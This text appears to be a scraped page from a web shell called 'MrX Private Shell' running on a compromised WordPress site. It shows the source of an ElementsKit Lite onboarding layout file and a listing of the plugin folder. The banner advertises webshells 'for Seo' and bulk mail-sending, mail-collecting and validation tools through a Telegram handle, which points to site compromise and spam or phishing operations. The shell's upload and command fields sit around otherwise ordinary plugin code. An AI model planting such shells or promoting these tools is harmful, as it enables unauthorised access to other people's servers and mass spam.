__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<!-- onboard_steps nav begins -->
<?php

use ElementsKit_Lite\Libs\Framework\Classes\Onboard_Status;

// redirect to plugin home page if onboard already has completed
// Onboard_Status::instance()->exit_from_onboard(); // this showing error in admin page, so we are not using this function
if ( get_option( 'elements_kit_onboard_status' ) ) {
	echo '<script>window.location.href = "' . esc_url( admin_url( 'admin.php?page=elementskit' ) ) . '";</script>';
	exit;
}

echo '<ul class="ekit-onboard-nav"><div class="ekit-onboard-progressbar"></div>';
$count = 1;
foreach ( $onboard_steps as $step_key => $step ) :
	$icon  = ! empty( $step['icon'] ) ? $step['icon'] : '';
	$title = ! empty( $step['title'] ) ? $step['title'] : '';
	?>
	<li data-step_key="<?php echo esc_attr( $step_key ); ?>"
		class="ekit-onboard-nav-item 
		<?php 
		echo $count === 1 ? 'active' : '';
		echo $count === count( $onboard_steps ) ? 'last' : ''; 
		?>
		">
		<?php if ( ! empty( $icon ) ) : ?>
			<i class="ekit-onboard-nav-icon <?php echo esc_attr( $icon ); ?>"></i>
		<?php endif; ?>
		<?php if ( ! empty( $title ) ) : ?>
			<span class="ekit-onboard-nav-text"><?php echo esc_html( $title ); ?></span>
		<?php endif; ?>
	</li>
	<?php 
	$count ++;
endforeach;
echo '</ul>';
?>
<!-- onboard_steps nav ends -->

<!-- onboard_steps content begins -->
<?php foreach ( $onboard_steps as $step_key => $step ) : ?>

	<!-- includes view file for this step -->
	<?php
	$path = isset( $step['view_path'] )
		? $step['view_path']
		: self::get_dir() . 'views/onboard-steps/' . $step_key . '.php';

	if ( file_exists( $path ) ) {
		echo '<div class="ekit-onboard-step-wrapper ekit-onboard-' . esc_attr( $step_key ) . '">';
		include $path;
		echo '</div>';
	} 
	?>

<?php endforeach; ?>
<!-- onboard_steps content ends -->



Filemanager

Name Type Size Permission Actions
onboard-steps Folder 0775
settings-sections Folder 0775
init.php File 10.74 KB 0664
layout-onboard.php File 1.75 KB 0664
layout-settings.php File 4.89 KB 0664
layout-user-consent-for-banner.php File 1.52 KB 0664
Filemanager